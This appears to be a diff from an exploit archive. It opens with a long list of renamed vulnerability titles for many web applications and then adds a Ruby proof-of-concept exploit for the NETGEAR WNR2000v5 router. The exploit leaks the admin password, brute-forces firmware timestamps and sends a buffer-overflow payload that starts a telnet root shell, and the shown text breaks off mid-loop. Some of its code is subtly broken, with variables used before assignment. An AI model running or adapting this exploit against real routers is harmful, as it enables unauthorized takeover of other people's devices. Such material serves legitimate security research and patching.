pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
pastelcms 0.8.0 - Local File Inclusion / SQL Injection

mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities
mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure

fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities
fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload

photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting

Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting

Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload

TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting

PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities
PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject
my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection
my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting

vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vidshare pro - SQL Injection / Cross-Site Scripting

asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting

minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting
small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities
small pirate 2.1 - Cross-Site Scripting / SQL Injection
amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection

elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elitecms 1.01 - SQL Injection / Cross-Site Scripting

flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
flashlight free edition - Local File Inclusion / SQL Injection

propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
propertymax pro free - SQL Injection / Cross-Site Scripting

virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
virtue news - SQL Injection / Cross-Site Scripting

mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities
mrcgiguy freeticket - Cookie Handling / SQL Injection

yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
yogurt 0.3 - Cross-Site Scripting / SQL Injection

campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
campus virtual-lms - Cross-Site Scripting / SQL Injection

translucid 1.75 - Multiple Vulnerabilities
TransLucid 1.75 - Multiple Vulnerabilities

impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting

adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
adaptweb 0.9.2 - Local File Inclusion / SQL Injection

CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities
CMS buzz - Cross-Site Scripting / Password Change / HTML Injection

elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities
elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password

phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting

Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion

Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting

webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
webasyst shop-script - Blind SQL Injection / Cross-Site Scripting

ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection

censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting

good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
good/bad vote - Cross-Site Scripting / Local File Inclusion

mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities
mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell

Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting
almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting
skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
garagesalesjunkie - SQL Injection / Cross-Site Scripting

iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
iwiccle 1.01 - Local File Inclusion / SQL Injection

Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities
Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection
cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting
d.net CMS - Local File Inclusion / SQL Injection

mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities
mobilelib gold 3.0 - Authentication Bypass / SQL Injection

elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting

shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion
mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities
tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities
mybackup 1.4.0 - File Download / Remote File Inclusion
tenrok 1.1.0 - File Disclosure / Remote Code Execution
AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities
AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting
opennews 1.0 - SQL Injection / Remote Code Execution

PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities
PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting

LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities
LM Starmail 2.0 - SQL Injection / File Inclusion

logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities
logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling

tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure

Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting

totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion

nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting

gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gyro 5.0 - SQL Injection / Cross-Site Scripting

Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection

Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Micro CMS 3.5 - SQL Injection / Local File Inclusion

Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery

Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting

eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting

Pre Job Board 1.0 - SQL Bypass
Pre Job Board 1.0 - SQL Authentication Bypass

Pre Jobo .NET - SQL Bypass
Pre Jobo .NET - SQL Authentication Bypass

PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting

gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gridcc script 1.0 - SQL Injection / Cross-Site Scripting

Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Layout CMS 1.0 - SQL Injection / Cross-Site Scripting

KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery

ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities
ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion

Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection

Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities
Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change

phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpMySite - Cross-Site Scripting / SQL Injection

quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting

DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities
DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities

jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities
jevoncms - Local File Inclusion / Remote File Inclusion

SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities
JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities

parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection

MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection

QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities
QuickTalk 1.2 - Source Code Disclosure

K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
K-Search - SQL Injection / Cross-Site Scripting

Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery

Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
Guestbook Script PHP - Cross-Site Scripting / HTML Injection

Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities
Max's Guestbook - HTML Injection / Cross-Site Scripting

Allpc 2.5 osCommerce - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting

TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting

Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection

Tastydir 1.2 - (1216) Multiple Vulnerabilities
Tastydir 1.2 (1216) - Multiple Vulnerabilities

WordPress - 'do_trackbacks()' function SQL Injection
WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection

F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery

PHP Coupon Script 6.0 - (bus) Blind SQL Injection
PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection

GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities
GAzie 5.10 - Login Parameter Multiple Vulnerabilities

BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities

Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting

DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities
DFLabs PTK 1.0.5 - Steal Authentication Credentials

Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting

Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities
Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

myPHPNuke 1.8.8 - links.php Cross-Site Scripting
myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting

Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure
PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection
myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting
myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting

phpVID 1.2.3 - Multiple Vulnerabilities
PHPVID 1.2.3 - Multiple Vulnerabilities
PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting
PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting

phpMyAdmin 2.7 - sql.php Cross-Site Scripting
phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting

ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting
ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting

PHPWebGallery 1.x - comments.php Cross-Site Scripting
PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting

MySQLDumper 1.21 - sql.php Cross-Site Scripting
MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting

KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
KikChat - Local File Inclusion / Remote Code Execution

EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting

LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities
LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting
Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection
Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting

Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection

ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution
ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution

miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query)
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)

ntop-ng 2.5.160805 - Username  Enumeration
ntop-ng 2.5.160805 - Username Enumeration

platforms/cgi/remote/40949.rb

@@ -0,0 +1,428 @@
+#
+# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb
+#
+# Remote code execution in NETGEAR WNR2000v5
+# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
+# Released on 20/12/2016
+#
+# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot.
+#       A more reliable Metasploit module will be released soon.
+#
+#
+# TODO:
+# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password)
+# - finish telnetenable (get mac and send packet)
+# - finish timestamp regex (?)
+# - randomise payload
+
+require 'net/http'
+require 'uri'
+require 'time'
+
+####################
+# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
+# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c
+
+TYPE_3 = 3
+BREAK_3 = 128
+DEG_3 = 31
+SEP_3 = 3
+
+@randtbl =
+[
+  # we omit TYPE_3 from here, not needed
+  -1726662223, 379960547, 1735697613, 1040273694, 1313901226,
+  1627687941, -179304937, -2073333483, 1780058412, -1989503057,
+  -615974602, 344556628, 939512070, -1249116260, 1507946756,
+  -812545463, 154635395, 1388815473, -1926676823, 525320961,
+  -1009028674, 968117788, -123449607, 1284210865, 435012392,
+  -2017506339, -911064859, -370259173, 1132637927, 1398500161,
+  -205601318,
+]
+
+@unsafe_state = { 
+  "fptr" => SEP_3,
+  "rptr" => 0,
+  "state" => 0,
+  "rand_type" => TYPE_3,
+  "rand_deg" => DEG_3,
+  "rand_sep" => SEP_3,
+  "end_ptr" => DEG_3
+}
+
+# Emulate the behaviour of C's srand
+def srandom_r (seed)
+  state = @randtbl
+  if seed == 0
+    seed = 1
+  end
+  state[0] = seed
+  
+  dst = 0
+  word = seed
+  kc = DEG_3
+  for i in 1..(kc-1)
+    hi = word / 127773
+    lo = word % 127773
+    word = 16807 * lo - 2836 * hi
+    if (word < 0)
+      word += 2147483647
+    end
+    dst += 1
+    state[dst] = word
+  end
+  
+  @unsafe_state['fptr'] = @unsafe_state['rand_sep']
+  @unsafe_state['rptr'] = 0
+  
+  kc *= 10
+  kc -= 1
+  while (kc >= 0)
+    random_r
+    kc -= 1
+  end
+end
+  
+# Emulate the behaviour of C's rand  
+def random_r
+  buf = @unsafe_state
+  state = buf['state']
+  
+  fptr = buf['fptr']
+  rptr = buf['rptr']
+  end_ptr = buf['end_ptr']
+  val = @randtbl[fptr] += @randtbl[rptr]
+  
+  result = (val >> 1) & 0x7fffffff
+  fptr += 1
+  if (fptr >= end_ptr)
+    fptr = state
+    rptr += 1
+  else
+    rptr += 1
+    if (rptr >= end_ptr)
+      rptr = state
+    end
+  end
+  buf['fptr'] = fptr
+  buf['rptr'] = rptr
+  
+  result
+end
+#####################
+
+#####################
+# Ruby code ported from https://github.com/insanid/netgear-telenetenable
+# 
+def telnetenable (mac, username, password)
+  mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00")
+  username_pad = username.ljust(0x10, "\x00")
+  password_pad = password.ljust(0x21, "\x00")
+  cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")
+
+  md5 = Digest::MD5.new
+  md5.update(cleartext)
+  payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*')
+
+  secret_key = "AMBIT_TELNET_ENABLE+" + password
+  cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt
+  cipher.key_len = secret_key.length
+  cipher.key = secret_key
+  cipher.padding = 0
+  binary_data = (cipher.update(payload) << cipher.final)
+
+  binary_data.unpack('N*').pack('V*')
+end
+#####################
+
+# Do some crazyness to force Ruby to cast to a single-precision float and
+# back to an integer.
+# This emulates the behaviour of the soft-fp library and the float cast
+# which is done at the end of Netgear's timestamp generator.
+def ieee754_round (number)
+  [number].pack('f').unpack('f*')[0].to_i
+end
+
+
+# This is the actual algorithm used in the get_timestamp function in
+# the Netgear firmware.
+def get_timestamp(time)
+  srandom_r time
+  t0 = random_r
+  t1 = 0x17dc65df;
+  hi = (t0 * t1) >> 32;
+  t2 = t0 >> 31;
+  t3 = hi >> 23;
+  t3 = t3 - t2;
+  t4 = t3 * 0x55d4a80;
+  t0 = t0 - t4;
+  t0 = t0 + 0x989680;
+
+  ieee754_round(t0)
+end
+
+# Default credentials for the router
+USERNAME = "admin"
+PASSWORD = "password"
+
+def get_request(uri_str)
+  uri = URI.parse(uri_str)
+  http = Net::HTTP.new(uri.host, uri.port)
+  #http.set_debug_output($stdout)
+  request.basic_auth(USERNAME, PASSWORD)
+  request = Net::HTTP::Get.new(uri.request_uri)
+  http.request(request)
+end
+
+def post_request(uri_str, body)
+  uri = URI.parse(uri_str)
+  header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
+  http = Net::HTTP.new(uri.host, uri.port)
+  #http.set_debug_output($stdout)
+  request.basic_auth(USERNAME, PASSWORD)
+  request = Net::HTTP::Post.new(uri.request_uri, header)
+  request.body = body
+  http.request(request)
+end
+
+def check
+  response = get_request("http://#{@target}/")
+  auth = response['WWW-Authenticate']
+  if auth != nil
+    if auth =~ /WNR2000v5/
+      puts "[+] Router is vulnerable and exploitable (WNR2000v5)."
+      return
+    elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
+      puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)."
+      return
+    end
+  end
+  puts "Router is not vulnerable."
+end
+
+def get_password
+  response = get_request("http://#{@target}/BRS_netgear_success.html")
+  if response.body =~ /var sn="([\w]*)";/
+    serial = $1
+  else
+    puts "[-]Failed to obtain serial number, bailing out..."
+    exit(1)
+  end
+  
+  # 1: send serial number
+  response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+")
+
+  # 2: send answer to secret questions
+  response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \
+    "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+")
+  
+  # 3: PROFIT!!!
+  response = get_request("http://#{@target}/passwordrecovered.cgi")
+  
+  if response.body =~ /Admin Password: (.*)<\/TD>/
+    password = $1
+  else
+    puts "[-] Failed to obtain admin password, bailing out..."
+    exit(1)
+  end
+  
+  if response.body =~ /Admin Username: (.*)<\/TD>/
+    username = $1
+  else
+    puts "[-] Failed to obtain admin username, bailing out..."
+    exit(1)
+  end
+  
+  puts "[+] Success! Got admin username #{username} and password #{password}"
+  return [username, password]
+end
+
+def get_current_time
+  response = get_request("http://#{@target}/")
+
+  date = response['Date']
+  Time.parse(date).strftime('%s').to_i
+end
+
+def get_auth_timestamp(mode)
+  if mode == "bof"
+    uri_str = "lang_check.html"
+  else
+    uri_str = "PWD_password.htm"
+  end
+  response = get_request(uri_str)
+  if response.code == 401
+    # try again, might fail the first time
+    response = get_request(uri_str)
+    if response.code == 200
+      if response.body =~ /timestamp=([0-9]{8})/
+        $1.to_i
+      end
+    end
+  end
+end
+
+def got_shell
+  puts "[+] Success, shell incoming!"
+  exec("telnet #{@target.split(':')[0]}")   
+end
+
+if ARGV.length < 2
+  puts "Usage: ./netgearPwn.rb <IP:PORT> <check|sploit|telnet> [noreboot]"
+  puts "\tcheck: see if the target is vulnerable"
+  puts "\tbof: run buffer overflow exploit on the target"
+  puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!"
+  puts "\tnoreboot: optional parameter - don't force a reboot on the target"
+  exit(1)
+end
+
+@target = ARGV[0]
+mode = ARGV[1]
+
+if ARGV.length == 3 && ARGV[2] == "noreboot"
+  reboot = false
+else
+  reboot = true
+end
+
+# Maximum time differential to try
+# Look 5000 seconds back for the timestamp with reboot
+# 500000 with no reboot
+if reboot
+  TIME_OFFSET = 5000
+else
+  TIME_OFFSET = 500000
+end
+
+# Increase this if you're sure the device is vulnerable and you're not getting a shell
+TIME_SURPLUS = 200
+
+if mode == "check"
+  check
+  exit(0)
+end
+
+if mode == "bof"
+  def uri_encode (str)
+    "%" + str.scan(/.{2}|.+/).join("%")
+  end
+
+  def calc_address (libc_base, offset)
+    addr = (libc_base + offset).to_s(16)
+    uri_encode(addr)
+  end
+  
+  system_offset = 0x547D0
+  gadget = 0x2462C
+  libc_base = 0x2ab24000
+  
+  payload = 'a' * 36 +                                                                 # filler_1
+    calc_address(libc_base, system_offset) +                                           # s0
+    '1111' +                                                                           # s1
+    '2222' +                                                                           # s2
+    '3333' +                                                                           # s3
+    calc_address(libc_base, gadget) +                                                  # gadget
+    'b' * 0x40 +                                                                       # filler_2
+    "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh"         # payload
+end
+
+# 0: try to see if the default admin username and password are set
+timestamp = get_auth_timestamp(mode)
+
+# 1: reboot the router to get it to generate new timestamps
+if reboot and timestamp == nil
+  response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes")
+  if response.code == "200"
+    puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..."
+    sleep 120
+    puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply."
+    sleep 60
+  else
+    puts "[-] Failed to reboot the router. Bailing out."
+    exit(-1)
+  end
+
+  puts "[*] Proceeding..."
+end
+
+# 2: get the current date from the router and parse it, but only if we are not authenticated...
+if timestamp == nil
+  end_time = get_current_time
+  if end_time <= TIME_OFFSET
+    start_time = 0
+  else
+    start_time = end_time - TIME_OFFSET
+  end
+  end_time += TIME_SURPLUS
+
+  if end_time < (TIME_SURPLUS * 7.5).to_i
+    end_time = (TIME_SURPLUS * 7.5).to_i
+  end
+
+  puts "[+] Got time #{end_time} from router, starting exploitation attempt."
+  puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)."
+end
+    
+if mode == "bof"
+  uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp="
+  body = "submit_flag=select_language&hidden_lang_avi=#{payload}"
+else
+  uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp="
+  body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2"
+end  
+
+# 3: work back from the current router time minus TIME_OFFSET
+while true
+  for time in end_time.downto(start_time)
+    begin
+      if timestamp == nil
+        response = post_request(uri_str + get_timestamp(time).to_s, body)
+      else
+        response = post_request(uri_str + timestamp.to_s, body)
+      end
+      if response.code == "200"
+        # this only occurs in the telnet case
+        credentials = get_password
+        #telnetenable(mac, credentials[0], credentials[1])
+        #sleep 5
+        #got_shell
+        puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
+        puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" 
+        exit(0)
+      end
+    rescue EOFError
+      if reboot
+        sleep 0.2
+      else
+        # with no reboot we give the router more time to breathe
+        sleep 0.5
+      end
+      begin
+        s = TCPSocket.new(@target.split(':')[0], 23)
+        s.close
+        got_shell
+      rescue Errno::ECONNREFUSED
+        if timestamp != nil
+          # this is the case where we can get an authenticated timestamp but we could not execute code
